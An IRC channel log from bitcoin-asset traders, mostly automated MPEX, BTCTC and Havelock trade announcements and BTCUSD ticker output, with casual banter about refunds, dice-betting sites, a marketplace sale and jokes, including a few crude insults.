= 14.416 BTC [+] Jan 18 15:24:42 what the fuck was going on in their heads ? qfn is for chips that never do any work like ever. Jan 18 15:25:47 yeah but doesn't unicorn blood only work with qfn Jan 18 15:26:10 no but srsly now... Jan 18 15:26:52 "Not surprisingly I have a lot of new refund mail - please understand that it takes a lot of time to work through them - no response doesn't mean I'm ignoring you. I'm also not going to work a whole lot today, as I have some life things to attend to." Jan 18 15:26:59 and then people bitch at mpoe-pr Jan 18 15:28:18 then 2 days later Jan 18 15:28:19 "Hi everybody - I just wanted you to know that I'm getting your mails - but I can't personally respond to all of them in good time, so I'm posting here. I've had a major personal upset that has tied me up for two days, so I haven't done the refunds as quickly as you'd like." Jan 18 15:30:16 [MPEX] [S.MPOE] 900 @ 0.00068 = 0.612 BTC [+] Jan 18 15:30:58 [MPEX] [S.MPOE] 20100 @ 0.00067278 = 13.5229 BTC [-] Jan 18 15:33:38 [MPEX] [S.MPOE] 13600 @ 0.00068 = 9.248 BTC [+] Jan 18 15:40:12 [MPEX] [S.DICE] 300 @ 0.00569484 = 1.7085 BTC [-] Jan 18 15:40:13 [MPEX] [S.DICE] 1000 @ 0.00568477 = 5.6848 BTC [-] Jan 18 15:40:14 [MPEX] [S.DICE] 2850 @ 0.00567915 = 16.1856 BTC [-] Jan 18 15:46:40 [MPEX] [S.MPOE] 23550 @ 0.00067448 = 15.884 BTC [-] Jan 18 16:03:45 [MPEX] [S.MPOE] 29550 @ 0.00067448 = 19.9309 BTC [-] Jan 18 16:03:47 [MPEX] [S.MPOE] 29150 @ 0.00067278 = 19.6115 BTC [-] Jan 18 16:25:40 ;;ident Jan 18 16:25:40 You are identified as user thestringpuller, with GPG key id 0FF2943DA179E169, key fingerprint 6ACE36E786F39A4ADC4506DE0FF2943DA179E169, and bitcoin address None Jan 18 16:34:14 [MPEX] [S.MPOE] 14345 @ 0.00067278 = 9.651 BTC [-] Jan 18 16:34:16 [MPEX] [S.MPOE] 3241 @ 0.00066815 = 2.1655 BTC [-] Jan 18 16:34:58 azx: as I said with each scam makes reputable people look more reputable... Jan 18 16:37:08 [MPEX] [S.MPOE] 12319 @ 0.00067802 = 8.3525 BTC [+] Jan 18 16:41:52 [MPEX] [S.MPOE] 5584 @ 0.00067802 = 3.7861 BTC [+] Jan 18 16:51:17 [MPEX] [S.MPOE] 2247 @ 0.00067802 = 1.5235 BTC [+] Jan 18 16:51:19 [MPEX] [S.MPOE] 10853 @ 0.0006792 = 7.3714 BTC [+] Jan 18 16:51:24 jurov: make my coinbr accont inactive for now Jan 18 16:56:50 [MPEX] [S.MPOE] 5246 @ 0.00066815 = 3.5051 BTC [-] Jan 18 16:56:52 [MPEX] [S.MPOE] 1604 @ 0.00066814 = 1.0717 BTC [-] Jan 18 16:58:54 [MPEX] [S.MPOE] 17646 @ 0.00066814 = 11.79 BTC [-] Jan 18 16:58:56 [MPEX] [S.MPOE] 4511 @ 0.00066791 = 3.0129 BTC [-] Jan 18 16:58:57 [MPEX] [S.MPOE] 2393 @ 0.00066697 = 1.5961 BTC [-] Jan 18 17:04:47 [MPEX] [S.MPOE] 3400 @ 0.00067652 = 2.3002 BTC [+] Jan 18 17:07:37 [MPEX] [S.MPOE] 16400 @ 0.00067652 = 11.0949 BTC [+] Jan 18 17:12:12 [MPEX] [S.BBET] 500 @ 0.00129998 = 0.65 BTC [+] Jan 18 17:17:13 [MPEX] [S.DICE] 500 @ 0.0053624 = 2.6812 BTC [-] Jan 18 17:20:22 [MPEX] [S.MPOE] 3700 @ 0.00067652 = 2.5031 BTC [+] Jan 18 17:20:24 [MPEX] [S.MPOE] 4900 @ 0.00066697 = 3.2682 BTC [-] Jan 18 17:27:58 [MPEX] [S.MPOE] 2047 @ 0.0006792 = 1.3903 BTC [+] Jan 18 17:28:00 [MPEX] [S.MPOE] 10253 @ 0.00068 = 6.972 BTC [+] Jan 18 17:28:59 [MPEX] [S.DICE] 500 @ 0.0053624 = 2.6812 BTC [-] Jan 18 17:35:35 LOL "Major Puppets Exchange" https://bitcointalk.org/index.php?topic=101902.msg1462442#msg1462442 Jan 18 17:41:26 [MPEX] [S.MPOE] 12757 @ 0.00066697 = 8.5085 BTC [-] Jan 18 17:41:28 [MPEX] [S.MPOE] 343 @ 0.00066696 = 0.2288 BTC [-] Jan 18 17:42:08 ;;ticker Jan 18 17:42:10 BTCUSD ticker | Best bid: 15.61550, Best ask: 15.69299, Bid-ask spread: 0.07749, Last trade: 15.69399, 24 hour volume: 74631.17637130, 24 hour low: 14.86861, 24 hour high: 15.98500, 24 hour vwap: 15.51891 Jan 18 17:42:23 damn, that's impressive...I wonder how long it'll hold Jan 18 17:47:04 [BTCTC] [ESECURITYSABTC] 1 @ 0.7699 BTC [+] Jan 18 17:51:04 [BTCTC] [ESECURITYSABTC] 1 @ 0.77 BTC [+] Jan 18 17:51:37 [MPEX] [S.DICE] 200 @ 0.0053624 = 1.0725 BTC [-] Jan 18 17:52:56 Pop, pop, watching stocks drop Jan 18 17:54:19 [BTCTC] [ESECURITYSABTC] 2 @ 0.78 = 1.56 BTC [+] Jan 18 17:54:28 [MPEX] [S.MPOE] 15742 @ 0.00067543 = 10.6326 BTC [+] Jan 18 17:55:00 [BTCTC] [ESECURITYSABTC] 1 @ 0.8 BTC [+] Jan 18 17:55:38 [BTCTC] [ESECURITYSABTC] 2 @ 0.8899 = 1.7798 BTC [+] Jan 18 17:55:40 [BTCTC] [ESECURITYSABTC] 50 @ 0.8899 = 44.495 BTC [+] Jan 18 17:57:23 [BTCTC] [ESECURITYSABTC] 51 @ 0.8995 = 45.8745 BTC [+] Jan 18 17:58:20 [BTCTC] [ESECURITYSABTC] 4 @ 0.9 = 3.6 BTC [+] Jan 18 18:00:53 [MPEX] [S.DICE] 500 @ 0.0052 = 2.6 BTC [-] Jan 18 18:00:54 [MPEX] [S.DICE] 2350 @ 0.00519852 = 12.2165 BTC [-] Jan 18 18:00:56 [MPEX] [S.DICE] 500 @ 0.00515816 = 2.5791 BTC [-] Jan 18 18:22:44 [MPEX] [S.MPOE] 8500 @ 0.00067269 = 5.7179 BTC [-] Jan 18 18:32:55 [MPEX] [S.MPOE] 17100 @ 0.00067052 = 11.4659 BTC [-] Jan 18 18:32:57 [MPEX] [S.MPOE] 1900 @ 0.00066696 = 1.2672 BTC [-] Jan 18 18:36:12 [MPEX] [S.MPOE] 2000 @ 0.00067269 = 1.3454 BTC [+] Jan 18 18:36:14 [MPEX] [S.MPOE] 9400 @ 0.00067543 = 6.349 BTC [+] Jan 18 18:40:32 [MPEX] [S.MPOE] 16523 @ 0.00068 = 11.2356 BTC [+] Jan 18 18:43:06 [MPEX] [S.DICE] 200 @ 0.0053624 = 1.0725 BTC [+] Jan 18 18:52:56 [MPEX] [S.DICE] 1500 @ 0.0053624 = 8.0436 BTC [+] Jan 18 18:53:41 [MPEX] [S.MPOE] 13492 @ 0.00068 = 9.1746 BTC [+] Jan 18 19:06:51 [MPEX] [S.MPOE] 1100 @ 0.00067839 = 0.7462 BTC [-] Jan 18 19:06:53 [MPEX] [S.MPOE] 30700 @ 0.00067035 = 20.5797 BTC [-] Jan 18 19:06:54 [MPEX] [S.MPOE] 17100 @ 0.00066696 = 11.405 BTC [-] Jan 18 19:08:10 ;;ticker Jan 18 19:08:10 BTCUSD ticker | Best bid: 15.70001, Best ask: 15.74999, Bid-ask spread: 0.04998, Last trade: 15.70001, 24 hour volume: 69292.11059501, 24 hour low: 15.20000, 24 hour high: 15.98500, 24 hour vwap: 15.58173 Jan 18 19:11:25 [MPEX] [S.DICE] 400 @ 0.0053624 = 2.145 BTC [+] Jan 18 19:20:27 [MPEX] [S.MPOE] 11350 @ 0.00068 = 7.718 BTC [+] Jan 18 19:25:24 [MPEX] [S.DICE] 98 @ 0.0053624 = 0.5255 BTC [+] Jan 18 19:26:22 what's new Jan 18 19:40:22 [HAVELOCK] [SDICE] 5 @ 0.575 = 2.875 BTC [+] Jan 18 19:51:06 [BTCTC] [BASIC-MINING] 1 @ 0.33 BTC [+] Jan 18 19:51:24 ;;ticker Jan 18 19:51:25 BTCUSD ticker | Best bid: 15.70002, Best ask: 15.78999, Bid-ask spread: 0.08997, Last trade: 15.70002, 24 hour volume: 68639.23158158, 24 hour low: 15.20000, 24 hour high: 15.98500, 24 hour vwap: 15.59218 Jan 18 19:51:28 apparently this is a thing now Jan 18 19:57:52 thestringpuller, you should have withdrawn everything to the last satoshi... then the account is considered inactive Jan 18 20:01:25 now either i'll add complications to accomodate you, or it will automatically subtract monthly fee till all the crumbs are wiped Jan 18 20:14:21 werd up Jan 18 20:17:43 ;;ticker Jan 18 20:17:43 BTCUSD ticker | Best bid: 15.75001, Best ask: 15.80000, Bid-ask spread: 0.04999, Last trade: 15.75001, 24 hour volume: 67569.84455962, 24 hour low: 15.20000, 24 hour high: 15.98500, 24 hour vwap: 15.59871 Jan 18 20:19:01 [MPEX] [S.DICE] 200 @ 0.00545797 = 1.0916 BTC [+] Jan 18 20:19:05 [MPEX] [S.DICE] 735 @ 0.00545796 = 4.0116 BTC [-] Jan 18 20:23:05 [MPEX] [S.MPOE] 3167 @ 0.00067507 = 2.1379 BTC [-] Jan 18 20:40:13 [MPEX] [S.MPOE] 16100 @ 0.00067137 = 10.8091 BTC [-] Jan 18 20:40:15 [MPEX] [S.MPOE] 2400 @ 0.00067112 = 1.6107 BTC [-] Jan 18 20:41:54 ;;tell assbot !ticker Jan 18 20:46:12 [MPEX] [S.MPOE] 19578 @ 0.00067112 = 13.1392 BTC [-] Jan 18 20:46:14 [MPEX] [S.MPOE] 1807 @ 0.00066696 = 1.2052 BTC [-] Jan 18 20:46:15 [MPEX] [S.MPOE] 11115 @ 0.00066495 = 7.3909 BTC [-] Jan 18 20:49:42 [MPEX] [S.MPOE] 9933 @ 0.00067168 = 6.6718 BTC [+] Jan 18 20:49:44 [MPEX] [S.MPOE] 2606 @ 0.00068 = 1.7721 BTC [+] Jan 18 20:55:47 ;;ticker Jan 18 20:55:48 BTCUSD ticker | Best bid: 15.76001, Best ask: 15.79989, Bid-ask spread: 0.03988, Last trade: 15.71616, 24 hour volume: 64511.61661050, 24 hour low: 15.20000, 24 hour high: 15.98500, 24 hour vwap: 15.61656 Jan 18 21:05:32 [MPEX] [S.MPOE] 3285 @ 0.00066495 = 2.1844 BTC [-] Jan 18 21:05:34 [MPEX] [S.MPOE] 7407 @ 0.0006633 = 4.9131 BTC [-] Jan 18 21:06:31 [MPEX] [S.MPOE] 14150 @ 0.0006633 = 9.3857 BTC [-] Jan 18 21:09:49 [MPEX] [S.MPOE] 756 @ 0.0006633 = 0.5015 BTC [-] Jan 18 21:09:50 [MPEX] [S.MPOE] 10000 @ 0.00066159 = 6.6159 BTC [-] Jan 18 21:09:51 [MPEX] [S.MPOE] 4244 @ 0.00066158 = 2.8077 BTC [-] Jan 18 21:17:25 first miner on the moon Jan 18 21:23:26 ;;ticker Jan 18 21:23:26 BTCUSD ticker | Best bid: 15.66113, Best ask: 15.70998, Bid-ask spread: 0.04885, Last trade: 15.70998, 24 hour volume: 62158.54979153, 24 hour low: 15.20000, 24 hour high: 15.98500, 24 hour vwap: 15.62612 Jan 18 21:24:24 suprised no one has put a single up on a helium balloon and sent it NEO. Jan 18 21:25:22 jcpham: that sounds awesome, and doable. send the data, via laser to those mirrors, up there and back Jan 18 21:26:08 i mean, it would count if you used a custom miner to send the getwork to the moon and back to your compy, right? Jan 18 21:26:59 latency Jan 18 21:27:25 a good thing to sacrifice to be the first moon miner :D Jan 18 21:28:03 but won't someone think of the cheese! Jan 18 21:31:19 ahahaha Jan 18 21:34:03 I'll have to ask Wallace about that. He might have some ideas on crackers and Wensleydale. Or a nice bit of cheddar. Jan 18 21:38:13 seriously....if we mine all the cheese from the moon, then what Jan 18 21:38:16 i like cheese Jan 18 21:41:45 then we cheese all the mine out of the spoon Jan 18 21:47:24 lol actually 2 days ago local newspaper did send balloon to stratosphere... with cheese dumplings sample attached Jan 18 21:47:53 http://trilema.com/2013/the-advantages-of-having-a-baby/ Jan 18 21:48:09 feel free to bother the start-up/entrepreneurial crowd with that one :D Jan 18 21:48:57 hey! i have a baby! Jan 18 21:49:08 [MPEX] [S.MPOE] 8930 @ 0.00067837 = 6.0578 BTC [+] Jan 18 21:49:16 better stress tolerance? actually need less to be happy? citation needed Jan 18 21:49:24 point of fact. Jan 18 21:49:39 jcpham good for you hehe Jan 18 21:49:52 i hate businesses also. Jan 18 21:51:22 they're the worst. Jan 18 21:56:33 and employment is slavery, too. Jan 18 21:56:46 hard choice :P Jan 18 21:57:54 innit. Jan 18 21:58:20 the best way is being rich through inheritance i tell you. Jan 18 22:04:52 Well... free money is always nice. Jan 18 22:05:33 [MPEX] [S.MPOE] 3983 @ 0.00067797 = 2.7004 BTC [-] Jan 18 22:05:35 [MPEX] [S.MPOE] 6019 @ 0.00066267 = 3.9886 BTC [-] Jan 18 22:08:43 It's not really free tho Jan 18 22:09:46 [MPEX] [S.MPOE] 4241 @ 0.00066267 = 2.8104 BTC [-] Jan 18 22:09:48 [MPEX] [S.MPOE] 8456 @ 0.00066158 = 5.5943 BTC [-] Jan 18 22:09:48 [MPEX] [S.MPOE] 8403 @ 0.00066151 = 5.5587 BTC [-] Jan 18 22:10:05 It would be my opinion that any large sum inherited should not be touched but invested. And at maximum, only take earnings above inflation rate for personal use. Jan 18 22:10:14 Keep it growing. Jan 18 22:11:48 Namworld, similarly like "inherited" mpex listed business, no? Jan 18 22:12:27 jcpham: I have 4 babys Jan 18 22:12:29 That's not really inherited... Jan 18 22:12:32 well, 2~8 Jan 18 22:12:35 just turned 8 Jan 18 22:12:39 and then my wife Jan 18 22:12:41 technically 5 babys Jan 18 22:12:56 Inherited would imply it's all mine. Jan 18 22:13:03 and taxes Jan 18 22:13:09 hate inheritence tax Jan 18 22:14:13 Can the gov finally make it's system fully digital? Valid for almost any government in the world. Jan 18 22:14:56 Ukto does she get spanked if she misbehaves too ? Jan 18 22:15:20 The system is ineficient and always rely on paper... It's expensive and time consuming to maintain... Jan 18 22:15:58 lol Jan 18 22:16:23 alsomst used the 1st... Jan 18 22:16:26 but thought better of it Jan 18 22:16:26 :P Jan 18 22:28:42 "o ease the point into a "low information voter" sort of mental context, think of it in terms of television" Jan 18 22:28:51 ok jurov, i think that's her meanest to date. Jan 18 22:28:56 https://bitcointalk.org/index.php?topic=6566.msg1462508#msg1462508 Jan 18 22:32:01 [MPEX] [S.DICE] 800 @ 0.00553918 = 4.4313 BTC [+] Jan 18 22:32:08 i've basically overtaken anyone that might provide me with some nest egg or inheritance Jan 18 22:32:34 probably in the last 5 years or so Jan 18 22:36:58 at tankpoint ? Jan 18 22:37:36 http://g1.std3.ru/G/1/C4/F8/35270-3871c55c154565b4fea5c7c0717966f5.jpg Jan 18 22:39:00 lol, what the fuck Jan 18 22:40:11 also this: https://www.youtube.com/watch?v=zQ36S3d1CaU Jan 18 22:41:08 [HAVELOCK] [SDICE] 29 @ 0.549 = 15.921 BTC [-] Jan 18 22:51:08 [HAVELOCK] [SDICE] 1 @ 0.545 BTC [-] Jan 18 22:52:08 [HAVELOCK] [SDICE] 10 @ 0.545 = 5.45 BTC [-] Jan 18 23:01:45 [MPEX] [S.MPOE] 2300 @ 0.00067201 = 1.5456 BTC [+] Jan 18 23:05:17 I was reading this http://trilema.com/2013/the-advantages-of-having-a-baby/ Master Puppet pasted here and I think this impotent fuck is a retard Jan 18 23:06:23 [MPEX] [S.MPOE] 3500 @ 0.00066441 = 2.3254 BTC [-] Jan 18 23:06:25 [MPEX] [S.MPOE] 6647 @ 0.00066325 = 4.4086 BTC [-] Jan 18 23:07:11 hopefully, he is never going to contaminate the gene pool :) Jan 18 23:11:45 [MPEX] [S.MPOE] 4900 @ 0.00067201 = 3.2928 BTC [+] Jan 18 23:11:47 [MPEX] [S.MPOE] 1070 @ 0.00067837 = 0.7259 BTC [+] Jan 18 23:11:48 [MPEX] [S.MPOE] 2630 @ 0.00067838 = 1.7841 BTC [+] Jan 18 23:30:22 https://bitcointalk.org/index.php?topic=136911 Jan 18 23:30:31 i guess im the only person that's not really worried about that ? Jan 18 23:34:30 I'm not worried either Jan 18 23:34:42 Although I would say more bitcoins is better. Jan 18 23:36:22 yeah MOAR Jan 18 23:37:10 ... MOAR! Jan 18 23:37:20 :D Jan 18 23:41:59 [MPEX] [S.MPOE] 11753 @ 0.00066325 = 7.7952 BTC [-] Jan 18 23:42:01 [MPEX] [S.MPOE] 15297 @ 0.00066151 = 10.1191 BTC [-] Jan 18 23:44:46 moar is better. Jan 18 23:53:53 [MPEX] [S.MPOE] 14446 @ 0.00066151 = 9.5562 BTC [-] Jan 18 23:58:27 you crashed bitcointalk again Jan 18 23:59:26 theymos should raise money for phat pipe and moar serverz...and then vanish :P Jan 18 23:59:38 lol doens't have like 5k or something already collected ? Jan 18 23:59:57 that's not enough Jan 19 00:00:05 o i c Jan 19 00:00:56 just loaded...I calculate again and again and still I have not enaugh bitcoins...orly? Jan 19 00:01:33 shoudl calculate moar times Jan 19 00:03:33 mircea, this is what worries you? "If Bitcoin grows too quickly - too many great minds might be idling around on beaches and frolicking with hookers n blow instead of building great things" Jan 19 00:04:18 [MPEX] [S.MPOE] 3081 @ 0.00066151 = 2.0381 BTC [-] Jan 19 00:04:20 [MPEX] [S.MPOE] 9182 @ 0.00066081 = 6.0676 BTC [-] Jan 19 00:04:21 [MPEX] [S.MPOE] 6921 @ 0.00066078 = 4.5733 BTC [-] Jan 19 00:04:23 [MPEX] [S.MPOE] 6601 @ 0.0006595 = 4.3534 BTC [-] Jan 19 00:04:24 heeh i've done my fair share of frolicking Jan 19 00:04:58 btw, on the topic on "over average minds" today's dilbert is spot on Jan 19 00:06:11 link ? Jan 19 00:06:19 http://www.dilbert.com/ Jan 19 00:06:59 [MPEX] [S.MPOE] 6906 @ 0.00067268 = 4.6455 BTC [+] Jan 19 00:07:36 heh Jan 19 00:13:09 [HAVELOCK] [SDICE] 7 @ 0.579 = 4.053 BTC [+] Jan 19 00:13:49 top 110%... is that 10% out of the range of the normal population? Aka in the -10%? Jan 19 00:14:14 [MPEX] [S.MPOE] 13935 @ 0.00067268 = 9.3738 BTC [+] Jan 19 00:16:23 something like that. Jan 19 00:16:31 Sounds about right Jan 19 00:17:09 [HAVELOCK] [SDICE] 1 @ 0.579 BTC [+] Jan 19 00:17:13 [MPEX] [S.MPOE] 13965 @ 0.00067332 = 9.4029 BTC [+] Jan 19 00:17:15 [MPEX] [S.MPOE] 185 @ 0.0006655 = 0.1231 BTC [-] Jan 19 00:22:01 [MPEX] [S.DICE] 1850 @ 0.0055361 = 10.2418 BTC [-] Jan 19 00:29:09 [HAVELOCK] [SDICE] 10 @ 0.579 = 5.79 BTC [+] Jan 19 00:29:26 [MPEX] [S.DICE] 1023 @ 0.0055361 = 5.6634 BTC [-] Jan 19 00:29:27 [MPEX] [S.DICE] 1288 @ 0.0055824 = 7.1901 BTC [+] Jan 19 00:29:29 [MPEX] [S.DICE] 965 @ 0.00562288 = 5.4261 BTC [+] Jan 19 00:36:18 who was the havelock guy ? Jan 19 00:37:07 topace https://bitcointalk.org/index.php?topic=137235.0 Jan 19 00:39:35 topace? Jan 19 00:40:10 um... no ? Jan 19 00:40:17 what a birdy whispered @me Jan 19 00:42:21 [MPEX] [S.MPOE] 4321 @ 0.00067415 = 2.913 BTC [+] Jan 19 00:42:23 [MPEX] [S.MPOE] 5800 @ 0.00067426 = 3.9107 BTC [+] Jan 19 00:42:24 [MPEX] [S.MPOE] 12379 @ 0.00067838 = 8.3977 BTC [+] Jan 19 00:43:23 [MPEX] [S.MPOE] 4321 @ 0.00066563 = 2.8762 BTC [-] Jan 19 00:43:25 [MPEX] [S.MPOE] 5379 @ 0.0006655 = 3.5797 BTC [-] Jan 19 00:58:13 [MPEX] [S.MPOE] 4321 @ 0.00067814 = 2.9302 BTC [+] Jan 19 00:58:15 [MPEX] [S.MPOE] 3241 @ 0.00067838 = 2.1986 BTC [+] Jan 19 00:58:17 [MPEX] [S.MPOE] 20493 @ 0.00068 = 13.9352 BTC [+] Jan 19 00:58:35 dub https://bitcointalk.org/index.php?topic=136953.msg1463176#msg1463176 Jan 19 00:58:42 price keeps soaring upwards and other things. Jan 19 01:00:03 and the followup advice!? Jan 19 01:02:27 obviously, money = filth. Jan 19 01:03:20 ;;tickee Jan 19 01:03:20 Error: "tickee" is not a valid command. Jan 19 01:03:22 ;;ticker Jan 19 01:03:22 BTCUSD ticker | Best bid: 15.74001, Best ask: 15.75000, Bid-ask spread: 0.00999, Last trade: 15.74001, 24 hour volume: 58044.24259200, 24 hour low: 15.41000, 24 hour high: 15.98500, 24 hour vwap: 15.67347 Jan 19 01:14:21 mod6 you around? Jan 19 01:15:08 ;;seen smickles Jan 19 01:15:09 smickles was last seen in #bitcoin-assets 35 minutes and 32 seconds ago: topace? Jan 19 01:15:33 hey whats up thestringpuller Jan 19 01:17:38 [MPEX] [S.MPOE] 4321 @ 0.00066575 = 2.8767 BTC [-] Jan 19 01:17:40 [MPEX] [S.MPOE] 4321 @ 0.00066561 = 2.8761 BTC [-] Jan 19 01:17:41 [MPEX] [S.MPOE] 13486 @ 0.0006655 = 8.9749 BTC [-] Jan 19 01:17:43 [MPEX] [S.MPOE] 722 @ 0.0006643 = 0.4796 BTC [-] Jan 19 01:18:32 yup barebackbot is on it again :) Jan 19 01:21:55 [MPEX] [S.MPOE] 4321 @ 0.00066446 = 2.8711 BTC [+] Jan 19 01:21:56 [MPEX] [S.MPOE] 19979 @ 0.0006643 = 13.272 BTC [-] Jan 19 01:37:37 [MPEX] [S.MPOE] 19000 @ 0.000665 = 12.635 BTC [+] Jan 19 01:37:39 [MPEX] [S.MPOE] 2850 @ 0.0006643 = 1.8933 BTC [-] Jan 19 01:49:16 [MPEX] [S.MPOE] 16799 @ 0.0006643 = 11.1596 BTC [-] Jan 19 01:49:18 [MPEX] [S.MPOE] 8200 @ 0.00065996 = 5.4117 BTC [-] Jan 19 01:49:19 [MPEX] [S.MPOE] 12499 @ 0.0006595 = 8.2431 BTC [-] Jan 19 01:49:21 [MPEX] [S.MPOE] 7257 @ 0.00065898 = 4.7822 BTC [-] Jan 19 02:05:26 [MPEX] [S.MPOE] 7369 @ 0.00065898 = 4.856 BTC [-] Jan 19 02:05:28 [MPEX] [S.MPOE] 1219 @ 0.0006589 = 0.8032 BTC [-] Jan 19 02:09:10 [HAVELOCK] [SDICE] 1 @ 0.525 BTC [-] Jan 19 02:10:11 [HAVELOCK] [SDICE] 10 @ 0.481 = 4.81 BTC [-] Jan 19 02:14:54 dont forget do drop these in your eyes before going to teh forums http://shrani.si/f/1O/HE/1XrqjeDY/imag0276.jpg Jan 19 02:15:20 lmao Jan 19 02:15:44 [BTCTC] [COGNITIVE] 1 @ 0.4249 BTC [+] Jan 19 02:25:36 and protective eyewear/gloves, ofc Jan 19 02:27:09 [MPEX] [S.MPOE] 3900 @ 0.00067671 = 2.6392 BTC [+] Jan 19 02:27:33 umm Jan 19 02:27:44 what happend to bitmit or that ebay like bitcoin site Jan 19 02:27:49 is it closed for good now? Jan 19 02:29:56 [MPEX] [S.MPOE] 12421 @ 0.00066857 = 8.3043 BTC [-] Jan 19 02:30:07 [MPEX] [S.MPOE] 14879 @ 0.0006589 = 9.8038 BTC [-] Jan 19 02:45:24 just another drama material Jan 19 02:45:38 https://bitcointalk.org/index.php?topic=41592.440 Jan 19 02:46:15 original owner silently sold it, it was discovered only cause new owner doesn't speak german Jan 19 02:47:05 and in meantime there were some offers to sell bitmit that were later retracted (decoys, perhaps?) Jan 19 02:47:52 jurov a i recall that, they put it up for sale cause "legal concerns" on the site itself Jan 19 02:48:03 then it mysteriouslydidn't make the unspecified reserve Jan 19 02:51:13 [MPEX] [S.MPOE] 421 @ 0.00067671 = 0.2849 BTC [+] Jan 19 02:51:15 [MPEX] [S.MPOE] 14579 @ 0.00067703 = 9.8704 BTC [+] Jan 19 02:54:01 [MPEX] [S.MPOE] 4321 @ 0.00067462 = 2.915 BTC [-] Jan 19 03:03:21 [MPEX] [S.MPOE] 8400 @ 0.0006745 = 5.6658 BTC [-] Jan 19 03:05:38 [MPEX] [S.MPOE] 11250 @ 0.0006745 = 7.5881 BTC [-] Jan 19 03:05:44 [MPEX] [S.MPOE] 9621 @ 0.00066399 = 6.3882 BTC [-] Jan 19 03:09:59 [MPEX] [S.MPOE] 3650 @ 0.00067436 = 2.4614 BTC [+] Jan 19 03:17:54 [MPEX] [S.MPOE] 10000 @ 0.00066399 = 6.6399 BTC [-] Jan 19 03:32:10 [MPEX] [S.MPOE] 671 @ 0.00067436 = 0.4525 BTC [+] Jan 19 03:32:12 [MPEX] [S.MPOE] 7479 @ 0.00067459 = 5.0453 BTC [+] Jan 19 03:42:20 [MPEX] [S.DICE] 1950 @ 0.00547355 = 10.6734 BTC [-] Jan 19 03:54:34 [MPEX] [S.MPOE] 4321 @ 0.00066418 = 2.8699 BTC [-] Jan 19 03:54:35 [MPEX] [S.MPOE] 7579 @ 0.00066399 = 5.0324 BTC [-] Jan 19 03:54:36 [MPEX] [S.MPOE] 5100 @ 0.00066336 = 3.3831 BTC [-] Jan 19 03:57:01 [MPEX] [S.MPOE] 4321 @ 0.00067437 = 2.914 BTC [+] Jan 19 03:57:03 [MPEX] [S.MPOE] 10450 @ 0.00067459 = 7.0495 BTC [+] Jan 19 03:57:04 [MPEX] [S.MPOE] 3934 @ 0.00067703 = 2.6634 BTC [+] Jan 19 03:57:05 [MPEX] [S.MPOE] 2995 @ 0.00067838 = 2.0317 BTC [+] Jan 19 04:07:28 [MPEX] [S.DICE] 953 @ 0.00545796 = 5.2014 BTC [-] Jan 19 04:07:30 [MPEX] [S.DICE] 1700 @ 0.00540345 = 9.1859 BTC [-] Jan 19 04:07:35 [MPEX] [S.DICE] 200 @ 0.00528914 = 1.0578 BTC [-] Jan 19 04:07:37 [MPEX] [S.DICE] 3749 @ 0.00528913 = 19.8289 BTC [-] Jan 19 04:07:38 [MPEX] [S.DICE] 398 @ 0.00521638 = 2.0761 BTC [-] Jan 19 04:08:13 [MPEX] [S.DICE] 102 @ 0.00521638 = 0.5321 BTC [-] Jan 19 04:08:14 [MPEX] [S.DICE] 1476 @ 0.00521636 = 7.6993 BTC [-] Jan 19 04:08:15 [MPEX] [S.DICE] 422 @ 0.00515816 = 2.1767 BTC [-] Jan 19 04:37:06 >>people were crossing out the "V" on the wristband so that it read "LIE STRONG" Jan 19 04:37:09 oh lol. Jan 19 04:40:20 [MPEX] [S.MPOE] 4321 @ 0.00067808 = 2.93 BTC [-] Jan 19 04:40:22 [MPEX] [S.MPOE] 2279 @ 0.00067838 = 1.546 BTC [+] Jan 19 04:40:34 o looky something for -pr to chew on https://bitcointalk.org/index.php?topic=137291.0;topicseen Jan 19 04:43:45 [MPEX] [S.MPOE] 4321 @ 0.00067824 = 2.9307 BTC [-] Jan 19 04:43:47 [MPEX] [S.MPOE] 6979 @ 0.00067838 = 4.7344 BTC [+] Jan 19 04:47:23 [MPEX] [S.MPOE] 3047 @ 0.00067838 = 2.067 BTC [+] Jan 19 04:47:35 [MPEX] [S.MPOE] 11903 @ 0.00067999 = 8.0939 BTC [+] Jan 19 04:50:11 Is there anything MPOE-PR doesn't or cannot chew on? Jan 19 04:51:40 Well at least they could afford to do a proffesional design like SatoshiDice... but what about the coding? Jan 19 04:51:51 [MPEX] [S.DICE] 2100 @ 0.00546512 = 11.4768 BTC [+] Jan 19 04:51:52 professional* Jan 19 04:51:53 [MPEX] [S.DICE] 223 @ 0.00547355 = 1.2206 BTC [+] Jan 19 04:52:09 dunno Jan 19 04:52:25 but what im worried about is some guy with 7 posts Jan 19 04:53:14 dunno Jan 19 04:53:20 i guess if sd goes down Jan 19 04:53:26 they might have a chance Jan 19 04:53:46 [MPEX] [S.MPOE] 16097 @ 0.00067999 = 10.9458 BTC [+] Jan 19 04:53:52 [MPEX] [S.MPOE] 16203 @ 0.00068 = 11.018 BTC [+] Jan 19 04:59:58 Namworld: I want more ram D: Jan 19 05:01:33 kakobrekla how many bet sites since the bitbet ipo ? 11 ? Jan 19 05:01:50 hehe there about :> Jan 19 05:02:36 Namworld people need to start coming to terms with the fact that coding doesn't matter. Jan 19 05:02:57 it's like a "new car company" came to the car show on the strength of "there exists gasoline" Jan 19 05:03:13 sure there's gasoline. it's a commodity. widely available, not too expensive. Jan 19 05:04:01 well, having your site not fall to pieces is a good first step ya know Jan 19 05:04:05 right. Jan 19 05:04:37 "hi, i'd like to marry your daughter" "what can you tell me about yourself ?" "i have a penis" Jan 19 05:04:50 "it doesn't fall to pieces" Jan 19 05:05:06 "hi, i'd like to marry your daughter" "what can you tell me about yourself ?" "im missing an arm, both legs and half of my head" Jan 19 05:05:56 lol Jan 19 05:06:01 braaaaaaiiinsss Jan 19 05:06:55 [MPEX] [S.DICE] 3100 @ 0.00547355 = 16.968 BTC [+] Jan 19 05:08:25 o, it's not even a bet site, it's a dice site. nice going lol. Jan 19 05:08:36 yea Jan 19 05:08:38 hi, welcome to Willams Bakery, we sell sausage. Jan 19 05:09:35 http://polimedia.us/dtng/c/src/13585607088.jpg << somebody needs to hire her as pr. Jan 19 05:09:50 how much Jan 19 05:10:14 3 sites a day. Jan 19 05:10:36 i visit more than tha. Jan 19 05:10:38 t Jan 19 05:29:11 [BTCTC] [COGNITIVE] 1 @ 0.4249 BTC [+] Jan 19 05:29:13 [BTCTC] [COGNITIVE] 1 @ 0.425 BTC [+] Jan 19 05:36:48 bah so i bet .1 btc on sd and i lost Jan 19 05:36:50 what a scam. Jan 19 05:40:11 smickles: you do? Jan 19 05:41:22 mircea: all betting games are a consented self-scamming. Jan 19 05:52:01 [MPEX] 